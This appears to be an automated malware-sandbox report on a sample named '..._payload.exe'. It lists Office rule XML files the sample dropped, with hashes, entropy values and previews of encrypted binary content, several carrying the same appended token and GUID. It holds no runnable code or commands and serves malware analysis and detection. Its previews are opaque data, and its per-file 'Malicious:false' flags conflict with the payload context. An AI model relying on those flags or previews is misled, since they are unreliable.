                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11792v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7356
                                                                                                                          Entropy (8bit):7.976028061790359
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:pHRUgGezqS5dXgHuqfux05MaIn2C5/iDq+yiKHhTttvyeH5rqULB:RGe+SoHuNnZKDX6B7v22
                                                                                                                          MD5:91A723BD0CD773DF402C7027BA82829F
                                                                                                                          SHA1:B6802512F2B7D6CBF1B492E3ACB39EC45ABF40E1
                                                                                                                          SHA-256:F9C0F25A1F1E831F8BC4FCE9952BE9EDEB7C3A5E5C7239A0AFD56A09DD854947
                                                                                                                          SHA-512:A4A78866BD128ECA0E0A085F202AB2B8978CFCC9A109566CC96F73D0D0669CD139291161B3F6EBD4DDFB5D7F29C0D8FD48A6A157EB8654949231CBE050FC781C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml[......G.K..+.8k.V....-.=c..x29..q.;.^p.t..W...|v.#....O.=]..V>.,@wn2...0.4..^'..k..q.....UDo.V(........{..=....`...R..5..../..5.u...&.i...jO..N..!.) .!..BV.4m..B0..Z.Z.9oxgE.....Z9...+.V.G...0........x.J.w..o..O....bi..8oM.....:=.1....T ....sx.F..'.0..C.~.Y)N..w..3.t..I.7.`M.y0.P..1....v.K.%)."..z....8...?<.fX..i...0...$T4..ji}....-.U.K.i.:...9.....&...tz.P....N..=..w._}..HC..J9E....)...s ....]...9...w..pc..H(H.....K4S...%.....4...s.&&Q..lR.l..{.H....A...#..G.O7W.q..94qC.;\..x.9l7....$..R.-#.&.J..j,4,..C.0..i...t.m./X gi.}..q.9....Q.<....G..1.T..F.:.g.."...0......~...O.=7..Ql[.A$.|.W...y.\.E....XJ.\.QT..|.u.."@..8.58ko.l5...-......%y.9..tOD...'2.....!..S...3 ,Z...>}.:.8..o.q...3#.>4...i.......F.vsXF.....d.&...F.>..g..>.N^.6}.....?...._....=..9..V.pX...#9..!.u.....B...r5....,$S.&..........l.D...[..E.......ik...l..K.p...k.y. ...[#B)._..._.J..!. m.....Sq..a......&l......../w.7.I...<..Q^.X6.c.mZ.hZ.B..=..u....|z=..j.3P..-2.|.J~..?...._.{..I

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11793v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1551
                                                                                                                          Entropy (8bit):7.875832320659218
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:d1g+ldmGJyp0y+lohaUyIMagQULM0TfeZUD:d1TdmGwSy+lJ5IatLMeWu
                                                                                                                          MD5:AA7D5AD45CBEF56BCFA5DAEBEE8A7CB2
                                                                                                                          SHA1:C406989B46F32C9F02D2733E8AFB4D33BE578965
                                                                                                                          SHA-256:8DA746951E4CE32806035D817EC0EC268AE89BE9AF4F6A3092F20A3DD91A24D9
                                                                                                                          SHA-512:3FDA6D36E15A6EF5D57A41B646557539FAB95C6C57A8423E41569EE3C72DB7A4B693DA823560EC679C74EAAE7AB6DB289CF07B515D9FDE93D6C107ED77C8C6F9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.A[.I.z......[..'t..>..i......a.b....f..A.~.Mu.B.<a.a.aI.E..."....3..c...>9?.j.-.E..B.....{..i...G..".!P.+.2....0.h.....c..~......B.<....}].7.[..V..~.,.[F=q%.e..N..`.g,.*...p......|L]-..U!j......8.]E.r.r. .j...d.~.'*L..a<..a.y../5tg.}&B=......N^.....f-]j..}...DG.U....k. n...Tx^........&..>.:..].L6^$....{..X.|#ZZ....6....u3%....{"....X..4...h.+...........o>.......q.f.8..%..A.v..23.f......r....1I\.s.x......_-<....Cg8...E.P#..W:.n.."...Q@Gs......j.@...3.%.........C...._.q.O(}.s.}o.L.1yF...<5....x......-..gq...A*.y[z3B...y......[..$T>8.;Q.W?...@...C/y{{..Fo...V%.YuO....\Tf.5..i.p.....g....1......V.......hN.g.&..(:.....X....e&....V;X....,..7D...ss.Z.{u...n...c.7.n@K._Ln.I....G6QM...#..o..MM.1.f.~.Z..H0.8.W.=U...y.t...:8D*..([.I..W..h1........7...IRs....X.7...L....=^BN6...l. |.....E..A.E...t1s....v.Z.....+@..wf..Q.#.....~|>..._..,+.Y.....m.3~.O.X..(1..l$.Q.......f_S..9.O......,.m..m.&.M...Oc1..>w.X0.j.j...99..W.......L.K.{..=.../DD.S+.........k......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11794v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.8837014721887115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NOghcEZwUfR0YkWnt2jNGM0XjNnGmzaxIaBBB/qanTUK+9OI8UiUrgty+WNgTbD:9hcEZwU0J73vBBByangKA98UZEWNmD
                                                                                                                          MD5:476B97E10D6DE68E73188BB36BBB750D
                                                                                                                          SHA1:432F721268363844AE8595452F30BFDA6986C7C8
                                                                                                                          SHA-256:981EDC33B8E4C2F40C8173397D09A5618E5E98113270E02C063912FA5E637FAE
                                                                                                                          SHA-512:A416E591AED1281DCCEB072FF3C686097378CB2A65BC18FE29EB76EABF325A8C30463DE419F713B57B069EB1EF822E67014F5043857336E48235AAD0D1716763
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.z......[..!n...m..`EM...........)$....eE..y.Y....T.kF..f0.....wt.ox..c...O...?...>...6.O...w9{Q......!.oTI.i.!......Rj.aJ.......U.1.......}w.uNZc%J=..1E.K.#t...e........z.X....^..Ow2.}.`h."..>a4.@tkCab>.6d.^o....A.....\g.Z.J.:O;88.Q..t..[..O.....}i.-....M}.*..e......Z.....r.......>...l.q.u......F.@.x{.#G[...&......=..g{..f.C..<c.g.o.Tw+..g{>'...m.....,.......QQ.f,/U@1.;!....D/.!d.4.(.t..fSh{3"'.y.g..u.)..3....9....,.c).-....R.".....3...m..qSo2.i..1r.......C...{...).5....mBq_Z../.&.,.R....y'..b3....=.\.=...k..+....0Cp...p.s.....7...,.od.E.......w.?.......-HM3..=L..6.......s.j.3.8.Eoe^....{<.m.#u#Qq./.<3$s..5.......8\..~.?..Fi...Tzd.E.8..nV.....U;=..y0Vnl.h..4w..\..4.6~.?J..N9h;G.h..SN.&...W....0.....K..(@.`..r...e;.4....R......;$,B..G\....nL:...7.....=`.n.....[Ci....f&....".dkr.V..x...]2...M.6...hT.a.1...4/FOP`..2._.. .zU.($p(J......)....7..ZZHD.v...H.X.4...D.*Q.z.r.:....p.J...\.......g.~rV.bK....n....j.D".7..?..>+j.k.h...P...Y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11834v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.882975083678467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lzA9TBkff12D5PAiS2c+n841KqNc3zkZAPVoJ/Nw+xeLD:ls9TAodPAPt+JKwc3zDPSJlpkn
                                                                                                                          MD5:2E28D32F532415CB48BD5D32F3990202
                                                                                                                          SHA1:2D64B0659DF6D184B8E92CAA16CD634788003704
                                                                                                                          SHA-256:94C0196E221A9E8D276ED9933DAFF8139C3B4416689FAB9BEE76422C521758ED
                                                                                                                          SHA-512:B8C6591E6EB6AC583AE104FB09EAEA45AF1D5FA11348F237220C2098E3813842F409AF8C36633CF14446E42225D85641B822FD18A55A44E7A634998629EE10C0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....".K>.Fr..UP....c.,....pN..._......&...:L.......b.<V..d@....).#.../....>...f3.P>..`....n.=...A..!.N....t..J..IfR........#.TzA.-5:(O...a..n2....x...?!.s.7+]....W.v.P.Q......1m/...M.DO...T:J.n..0..:...e{.....%il|}.D......9'0......z..J...n.o6.S...._?.sSG.^.{(>..eb.0..#..,...h`.`~z..gm.6c.....#.`.F.v....Nf...S..{....<.%M/......X...1.a..^...H..w'.a.m.X....W.s...5..U<.W."..ah.~...<.....2k..ne}....'.W..n.I.e.g.&..4s.i..=.4@FK...G.D.....5.O.k...../1.~..;.$......KDZ|.1.!R...UL.X6/.=..6..2......P......\7....Z.Y....hl.^E..M....C9PY.(.U.W.....{.........g....{h......N.M....5].../.A....K..V.B.....`...G.?...}......N.]...k...`...:...R}.|.>....K...Z(.K...G..go!..o...R....g....w.e..J~..oi'Vu.../\A...i!`.*.....4[O.F9YO..~.9.)I..7.:..v..w...k...p....^.@N....w.m.<^.f......$L..Kp`.J(.....a.Jm"..q..F.d.A..#.x...*....a...Q...w..!..:/....'......,.<+t)F.......o......D.a...q.).0<............N...D.r./.U...tC.k...W..(.^..n.r.Z.}..=..2...E%..O=...'..[>#...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11882v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1448
                                                                                                                          Entropy (8bit):7.86474191889943
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NrMwplLKSSNIGOc+cGQseD/H2hCghIjIiav8M0LKGO0OywsmsIp77bD:1MUK1NIw+ss0/ChIUorLdN2lzD
                                                                                                                          MD5:402C5760E0A5451B77330F130E5213FB
                                                                                                                          SHA1:2EE4B38074BD5D0A5A7571BFB51AA33A92B3C559
                                                                                                                          SHA-256:6EE80D93A4F36834E9807DB0782F9831C8210ADB41EC7DBCB214FBE32DD8368E
                                                                                                                          SHA-512:F704B95A506FAABB66B8AD41CB94F9646D4D0C7F2EB0AE946612125CD3F2190C0FEBD6A81A54DEF02207555116D5A54096218FCBCF85BEDFB0799C1C75B21A4F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlp..6......D.'.1.e..}.g&.e.H4=..@.!{.P..W.0U?G...."..........1%.......j..`...x9J.+a.F...._....3..UV..^z....3..2...U.kY......t.i^....I....y..:..,>D....)..(.....j..9.ry.0_..#._[.I!...Si...o...K.d.F.p.....T5....S...s.r#-..%\..}.].....GR...W.MlzU.a&...-v.....d.d.O>._..L....Cj2..f...v.4.cL...r....z~..y......'.....-.b.....YSq.k?.!.aN;.I.3.0........sB...z..w..d..&7,..x..C....*...V.....+\.M..Q........rLe.....;....l.$.53...[...8..V.<....Js.......0...hUYBH.w^.1...P.c..0..4...A....#`..g../.U?.'..._...9.%U.,).@UKC.[....C...,Y.U..s....3.....~*........:.2U..... .?$H..w.....@..N.W......2^..R..Wbv1z....}..IAT.rg.z.ot~.....q.....^.V4.3..,e......'/y(W....y..8..=..wSQ.w.;...3k.?.R...B......f..7..........^............H...G.Ks-kw..L.....>.J.V.L..@.T.Bq.....O.#...2.....m..Q|p;..a&.6..y...{....#.....[n.L]......-..].../.0......j.d....9,?1.>M.b...N..4..T....._.....n..~....B.}1.f...,.u....J ....@eNlv.0.. ....m...~.G..e.<....!.\..3...4.[....,CX).cb+

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11890v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1419
                                                                                                                          Entropy (8bit):7.875361109763249
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:fZBaIhKtxHJSkRd65BGEORC2F0GGlm5/A1mQ8dhoAZFlgbD:RsVtxpnd6/T+M9mAAZFl6D
                                                                                                                          MD5:429FFF92C81D86918EFA1C255E550F66
                                                                                                                          SHA1:63CEB5C64510F1741358B88DE69978741D781446
                                                                                                                          SHA-256:C02560D2BE4AEFB59D78055604FEC52CF7828215BBACF5EACB31A3A5FB0E8D90
                                                                                                                          SHA-512:4D50035D72E691119EF52784660C77ABD9D69CB3497ED2B48F758C6034074F4A4E4AE3294873D749964E75BA4499CCDE07061E6323F3F31118D0F194DAD91F31
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......./....I.i.....k.I.Q..w.1y..~........l....5....@F.`cv.T........E.....6.Kf...s.u.3r...TE.'.q..!.b....o.K.q$Ph<}3.$...ud..Ml...hsi-.<\..W..g.'.g....y..Gj_0...y.....~.(......aw.E5Wq.....$.....I...15...O.|.m.j.^>..d.J3{...V...!1EF...vG..._>....m...J*19u.......L....gT.;xm5...a.8.......?.*...Y...yi.....,..Xm.7....|...A.DrO.O..|k....m~...........`I...P.....9. ."s.nH.L.#..!.#..)g..r.......~.Xh.....1...]]Z...D..|...B..{......b..L.."....P".n].Q.....PC5.+,s-......y.Q.....rHf. M.....s...P?.=w@&..=. ...;........0.g......l...a...,.......e\.."%.F..Px..CYl.......r.*.O./....."K...l.....b=I....qh#'.$...i8P.O.{Z .mr..t..~.x....]......`.8.r...K5.....s.../E3.....1.<...b.)P._.-,..)..~........!&.......2<..iI.HQ"..x......s..>jQ... Q6..=[v.c..L...e7......r..x....G.Qo.p?R./.....[k.....Xa1......6y.&g.#..._..`.*9..~V.$l-.XA.M..O... MqpR)l.T...\......1.X.X.L...PS.5.:........[.9..M...c..-..&E ..5.j.|E.4.Y.."..'7.v..._Nd.U.N.;.Y.t..e........?G+t..C.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11930v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1546
                                                                                                                          Entropy (8bit):7.877261514601806
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:RUOabvHMXE/kYTp7KKa4CMWeJHAJPcNrPQytyUgyDTgWImXbmgqPKhZ6yE4+bD:uAUD7KUW0HAqr/kO5hqPKh5E48D
                                                                                                                          MD5:E29D177FAEA7090DC657A578D02481C5
                                                                                                                          SHA1:91876A2F61593501AA60C6281699CCA57C9982F3
                                                                                                                          SHA-256:9CB6B5216937D4977CCBD197530B1FD3089CE2B44752169B25CB1543596EA268
                                                                                                                          SHA-512:E407688D9746E4B7787A17DCA62AE376A90DF07552ABE23B44BCDA02AEB9B15B261362547465604281302415130A31B68F29CB49E345ACCE27F926FDC492FEE5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.%.e"OAX...w........=i0...V........+......1.s.......Y......H.._Q.z.....>.VW...vvp...CTd.t.....-Q.6.......Z...G..cF..b3."......u~3....Mh/..8Z.7.....FV.jl....!O...m....|tS..ef2..Q..PC...`.$.}..`JmM#...7.z.....j.O'.N9.I.2..<.Kgs..L..........+.Hw.dHir...~80|]....J...#...d.7G. ..P....Qv...&.trH....N..f........f......6.#o!....%?...;..9a.M.-......J.....Y.e.03On....6..x..R]B..K>.n./)..,.8...Lx.M...,......a.....<.&..ng..e........=JP..k"D.._.....3.g...N.:.......Sv......&...M2^........f..9..6M.....`...S..[r.....X..y.b..O..'<..W.As.r..Dn....n..F.{U$.....t..V..;....K....,5+..].l.........xL'....I.r.).).[...}>. 3.)'#.*B7.qR.....^.H90....-.LO]......nE.m.....>..'c.@..4.n..;&.I...C...J{.NX=Q$.I.X;).D.X.l.s.@r..R8.z.x.I...e..@...4..z./'.....,...7...j!V.L...f...TE..,.*.Nh.i.o..D.k..v.}.z..B......6.e......7..5.;/.Q........G.l...e..!M._...=....Au.....Q...M&.=*9..L..1.c..F@z.......6...c.G\O..Dq}-F.(...\[.N...hA...T......X.....n.l.R..>..".{.|.@A..IY..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11931v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):903
                                                                                                                          Entropy (8bit):7.705458949121313
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ujiYgyoVE8uDoBpi9yiuBPy6n6XDvo81Ir58mbw9+o3wCG+Fp7yfTeEq5bTcii9a:U+VDBpayil/rV9nwlFfq1bD
                                                                                                                          MD5:1CAB2CE51501B1DEFA9509CAE68449DB
                                                                                                                          SHA1:D131E504F52D4BC311AD655934442D0AF64C9D7F
                                                                                                                          SHA-256:A90ED4D0631FF6040D6311957A02832BC60FAEC4D2F22F80A87A96F0B1627C51
                                                                                                                          SHA-512:89F1BE52A48F785DB89EE4DD055E8FC3CF3F2AF0E35A10D31D01B3AA4090F4CF1FF8185119FD67C5F3304707C7B43472E85DCE83130E385F844F9BF3D174005F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml0..vY.....L.{+K..a..5C.&'..K.h...{....2!.|....Y...h.^@......#&C.. ........Uk6..a../j......!...)....{.'I..c.=D...H.:..P.6D[..,/.x.`...h6...fTG...n..G'5<;.&..3....&+.2...r...;.I]&. iI..mR%...|)<.....K!-^../..*..3tK....(.r.@..9.<..e....Sm..a..9..r..3.P'l..q...z.....sD.....?A..F8..../..L/...F.1l.z@....{%.....q..A...|..L.M.K.H~...(.|.r.H..........,...n.(..D...1Y...7......._a......<...R.2.sg+P....^...../iV>>d..9q.......y.Kra....VxT.....{.t.+D%V?R".H...o1Zi...8N...&:9.S..2.n..zs.._.Y$4....aRh..).........|.X^.........t.=....I.#B../.T3a.|.qs=....[.$W.'2GMY.....5.[..6..Q7l...`.".Yz.~..>..O..=9..f}.U............R..........*..1.}P.0{.C8...$.............'S.5.A....4|).w..~pj...s.'....FR.....Q@..l.._...qm....z.M.)f..~..w6..=O.R.B..*..o..+r8.6if...Y..l......n2Mx.#.).5.c..{..2A?dWd}T..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11932v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3566
                                                                                                                          Entropy (8bit):7.94839343124114
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:JFvmAr4CO/qNMXaju0Rld7uLAh2gKUE3Y:J7iyNMqjXRdh2gKUE3Y
                                                                                                                          MD5:A31A62FA1E88DAFAD8EEA6D54D44B133
                                                                                                                          SHA1:74066AFA74DBC0907202B38654A8F6BD94F87331
                                                                                                                          SHA-256:F95FBB60E14D7CB7A61BC79717CD45FD9AD92EBA4A0B601379383EC08A58EFA4
                                                                                                                          SHA-512:2B535C77FA00A40751E8739DD586D922559930E0B7AE4EC757506BF8EF0F82587549A3DA7F441DBBD73570ECEDEFC9C2E86F2AA306AEC3E761207A13A1216AF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...g.......-.}k...}..|.?._r..>f.-..-1.|.$).S!.x..=d-...^.c./V......z.[*I...n...o..S.;......;.......(.....0~.zg/..H.}..<....2T%&1.f:Aq..H........Eb7#f..S@.......I".n.".ac.]@6..r..>..b..:.......C...A?...[r.O.AR.]...q.:".H.KY...6...H....U.PMk...G.C.......|..7l.[.....[.t...;.k.d...W[..?@."....j$.w%...`i.I.0.u. A...fml%(4.q..X..Y..X.=.g3..C....B..M}..o.})$...u.!..`....Z..$6..a.....)........Df.7....PDhg....h.....P..Y[...zN.._,>.......P.NX.kO..RLW!*.o.'.y./..l..L>.......;....@(l..t...."y...w!c...B.......ffq....j...#m..'....v7....>...p.w;....J.y..;.g`.K.f...O=E\.....O.N....,.*_.M.NH-......bO......]API......pg..2ALa..P.A9..OI6w..;.q`Be......"QL..\".Bf.*.F.+.X.....F.r...G....i=[..u.q.....N.auk.yO]..q.Q...Y..)?.&.....z`.D."f.d....l..N..../......q.l.U{?.........w....}1d..(....s2.(.....{.-N.0.(...CWe.B..!.[e.H...t....J&....!I....n..Y.lr..K.>.d.GF.+..GJ.'.jt.T.J3.Ye.;.-...>.bh...J..................hS.TyN....d.%..dU..i.v..B...lN{.:Bw-0.0....85.....x

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11933v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3677
                                                                                                                          Entropy (8bit):7.948045416114305
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:qHt3WaGpLUuCCPv6aigBC/h91iWH7LZMjgGYkm:64Iu/P/BC/h9DPwY1
                                                                                                                          MD5:9A608EDE141AC12366C3F8F78F55181E
                                                                                                                          SHA1:9E71186EA0281D5279449F7BA52EE7BEA7FCF86B
                                                                                                                          SHA-256:573973CB2128EFF63AB1575E58EEC82E5B819F03D87CEAC79EEFE3D5E4788B06
                                                                                                                          SHA-512:E24C4A7DB96FD43995E72037327D4B019FB4D7386C1D561D925CD245064B4FB7835DDC57E646215216BE8DBE99078D039D38B1FD377B4D4DAC19343BE844896E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.".....T8|}.j..`.Z=Q.Sd.........S..6..=.2$.MHt.p..o.......t....M.gI9.........?^.;@C..ts1gs....W..r......O.!.>}.{.b~...M).[.iD 5..7.#..^........R.(...N.,iau.9......X+Y......'\."z..C...{...>...V....Gp...0...z@.1.y..vV..O.>.Wz...KT..8e.x...q..F..&..\ ..'k..n{...la...2..k@.!..).....Iv.b.MR..2...!.$....U..&.T..B...9.@G..v..v..#P...]<.62..f7....u..nA..N.1~.4.S.....z..F.k.3..Vw..p 3a.D.y<$7^+..dWb]VSW...![.......b..f...Lg.S...=....}).~/.A. ...{..H+.....\.......y.G.<g..z.H.,8....[..._....E..2.O..F?...../.p<.a."!.2@].r{~(...+...n$.HP....B......q.@Z.f.@M._...l....`.....I..7.c\Q4..+kC.VQ.n...X....]..-.(!....~..,..I_./......F.L.A...p....-Rf.X.D.d.`P....y:}@....S.T.!..f...~G....R......8.......i.2&u=O..&MZ..]kF..w .C..L.w..#b.6.E..j..N.(.s.$...h..1d.K.V...>...n:.RY..6?....%.0.2...zH#..........:Ep.L...@..Q79..jq.A..P...P.?..)=$0PiB....w..<\.E'.b.E-~:E.P.s..A.X..]..9.T....LKx...C*...E....m.}2.2.##..G...M.L....n.4A.G\..X.3...z._..z..;.f..s..T..p..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11939v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):744
                                                                                                                          Entropy (8bit):7.6779975698612075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:QrGa4VevGXOuVlXQHg0mNEE070agnBIUOrsa12iktoUIT4n63ovtav7f/LiLhCsi:QZKOwXlXtfNEE07UpLH0O7vt0MwbD
                                                                                                                          MD5:A54CDE305ABC7A6BDBB720AB7DF28A86
                                                                                                                          SHA1:2AF42CE885AECA4E817215915987EFB6CD8A9AFF
                                                                                                                          SHA-256:95286251CB7894495733D39D9538BE1867658FF3181ED27F08ECADD3C7B99600
                                                                                                                          SHA-512:16B393857E0B8D0C4B01416307C0B23E75136592021B14E70271CC88FB26035635E5A79A1710A59A17BF6E64E296ED4AACB8A1BE970C38E92499DB37ED6F3808
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml-p\._....6'.'.R..Lg,....t....x..N.G..t...{.....{i.M.F...2R..>.I.V.3.;W....m_....M.... ...T>A.w..k}T.r/..zO^x#..=....._.w-.$[*a.t.....j=...^.428.....0.P..U.PY..........D.Zi.V....r;-........R........9..fe$.x...5h.......X...Ar..4.?D......._0......Eb...;&Ra^.5..:}.6.E\.j../?....T2.._....u..X..q.\....ADr....kG..z....r.....ft=....4.u#...~#...KK).bOpF..7..]....Mj5..A..j,d..H.t..HC..w.CX.M..|...A.....<M.F..u...V.....L&.}...C`..}.y.....#....qp..%"g@k.....W64..(..............I...z.G.7$^.s.....J..+...E..t........$...jBU..c.j...3..Kc!..Kt.E....?.y.h.....'.|s ....zv..eb;|.DF...z^.........W..p...y{....4....>rX.\..Q.F5........e.."..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11950v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1620
                                                                                                                          Entropy (8bit):7.869192061326185
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:25aB9V9YbKFtPI1E2Q36IVJH+jDo1Xi4TyFDLQrxhQUQW1OfKFQ/eP7I8eIdOLkI:7nPWEfqIH+Ky4iDLQ96GkIQe0nIdgD
                                                                                                                          MD5:D4244D04DBF416E7D2E3C2C8DBF6BD4E
                                                                                                                          SHA1:6EE90B833D69F0688982D6E75B583192806A2E46
                                                                                                                          SHA-256:054AE590EEE3B00BD166DFBBD001A0DFE321DE983E899196F01CF9D77E96F20F
                                                                                                                          SHA-512:13F8F6883C2CF47615E7EF5D616481E2945AAEB7879B82C8BD05099607FB55B9498D07811310BFA35028B18FED33E0EAFA15A55CB4F0F9DE4268801B5607A0D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..Z.....qrX..Zy.O..K.._..'...R.TVe*Ha(v..M.....!Mw...@..7..B.......-...~".t.......0........H.k..C..)g.~.xbE.:.# x5..*.QG..'..\i2...t...6<5.Ybz..|j.1k...B..3.7(....R...F.}......z]5.. ...%)M ......../....hT.sQ.K....N5..].~..<.&S5'.....Z...G...........cu.a.....8......E|.7........j!.....FP[6....-..cV......h.(..9Yz.%...""..K..>:....t..o/L....^.I.......a..-M.P.-*JlVf.^Gm.y.XO..xl.%..=+y^......-..v.S.61..5B,.'.m....j"SK{sI.q.J.Q.X.j.....x.\G.)T<..#P.^bL...;e.%...7...g.zX.(}...UY\HB.R.....]]d{.x.R.Sd..&:....p2Y.BN.G...Rp...4<.."..$L....w*k.@......g...f&.....ZAa..)W)..C...Q..#9.m.K.%.g.B..".t.%.a{.......i<.g..C...v...+.N.aiA..W..5l...Z .o>'*.Y...k;N.K..b.H.P#...,x..n,.e..Q...B...r.b.^....2ro.v.q.... ...!........7T.O..<..M.KT.4.Q...x-....{,..o....6.....-I+..J...[e.P~jF..,M:..6..9..a...G..k'V..x..t@..c...C.v....vY....X.2O.x+.6.4...%..lI..2.4.:=...C...Kl...._..V.t....$....!.Z.7z-..1.....ZqV.b..8..0.w1..].y..r..4".H.@...pq.s._........B...I.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11981v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):821
                                                                                                                          Entropy (8bit):7.74818601804176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:o5JCcz5CIiLdiy9DYtkLwXA6ksGYYTE6rgb7u4Vbw0jE1KVdt03kfq5bTcii9a:o5nzpiBR9okLiMsnYQtRE1JDbD
                                                                                                                          MD5:605580AE6721D56CCB5F265E0BB7A86E
                                                                                                                          SHA1:1300CAFADA03EA608319A4499B6531FDBEB66082
                                                                                                                          SHA-256:ED3EFE7D057769B2113D41CDB449269A44184099A06786566542A0EB881CDDAF
                                                                                                                          SHA-512:E3C0265334DD7F6962B8DF63760E07764FE858CF12E949B056DDC93B3FF101942CBE083D6EC799B34CB87BFDA706CADDC1FCB61327540CEC244829D46D2359CB
                                                                                                                          Malicious:false
